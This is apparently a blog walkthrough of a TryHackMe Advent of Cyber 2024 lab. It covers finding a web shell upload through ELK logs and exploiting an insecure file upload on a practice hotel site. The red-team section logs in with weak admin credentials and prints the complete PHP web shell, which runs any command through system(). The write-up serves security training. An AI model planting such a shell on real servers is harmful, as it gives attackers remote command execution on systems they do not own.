THM-Advent of Cyber 2024 Day3

4 min readDec 4, 2024

Even if I wanted to go, their vulnerabilities wouldn’t allow it.

The Story

Today’s AoC challenge follows a rather unfortunate series of events for the Glitch. Here is a little passage which sets the scene for today’s task:

Late one Christmas evening the Glitch had a feeling,

Something forgotten as he stared at the ceiling.

He got up out of bed and decided to check,

A note on his wall: ”Two days! InsnowSec”.

With a click and a type he got his hotel and tickets,

And sank off to sleep to the sound of some crickets.

Luggage in hand, he had arrived at Frosty Pines,

“To get to the conference, just follow the signs”.

Just as he was ready the Glitch got a fright,

An RCE vulnerability on their website ?!?

He exploited it quick and made a report,

But before he could send arrived his transport.

In the Frosty Pines SOC they saw an alert,

This looked quite bad, they called an expert.

The request came from a room, but they couldn’t tell which,

The logs saved the day, it was the room of…the Glitch.

In this task, we will cover how the SOC team and their expert were able to find out what had happened (Operation Blue) and how the Glitch was able to gain access to the website in the first place (Operation Red). Let’s get started, shall we?

Learning Objectives

Learn about Log analysis and tools like ELK.
Learn about KQL and how it can be used to investigate logs using ELK.
Learn about RCE (Remote Code Execution), and how this can be done via insecure file upload.

Answer the questions below

1- BLUE: Where was the web shell uploaded to?

Answer format: /directory/directory/directory/filename.php

Question Hint
Images are stored here.

2- BLUE: What IP address accessed the web shell?

Question Hint
Filter the IP values in ELK to determine their activity. Only one of them is malicious.

3- RED: What is the contents of the flag.txt?

access the Frosty Pines Resorts website (http://frostypines.thm), you will need to reference it in your hosts file. On the AttackBox, this can be done by executing the following command in a terminal: echo "10.10.57.139 frostypines.thm" >> /etc/hosts

Go To Login Page

Usage of Weak Credentials

We are now logged in with the admin account

We will go to the admin page, go to the rooms, and add a new room

Now we will upload the shell in the Browse box and get the RCE

Exploiting RCE via File Upload

Now we’re going to go through how this vulnerability can be exploited. For now, you can just read along, but an opportunity to put this knowledge into practice is coming up. Once an RCE vulnerability has been identified that can be exploited via file upload, we now need to create a malicious file that will allow remote code execution when uploaded.

Below is an example PHP file which could be uploaded to exploit this vulnerability. Using your favourite text editor, copy and paste the below code and save it as You Like

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="text" name="command" autofocus id="command" size="50">
<input type="submit" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['command'])) 
    {
        system($_GET['command'] . ' 2>&1'); 
    }
?>
</pre>
</body>
</html>

After the upload shell, save the room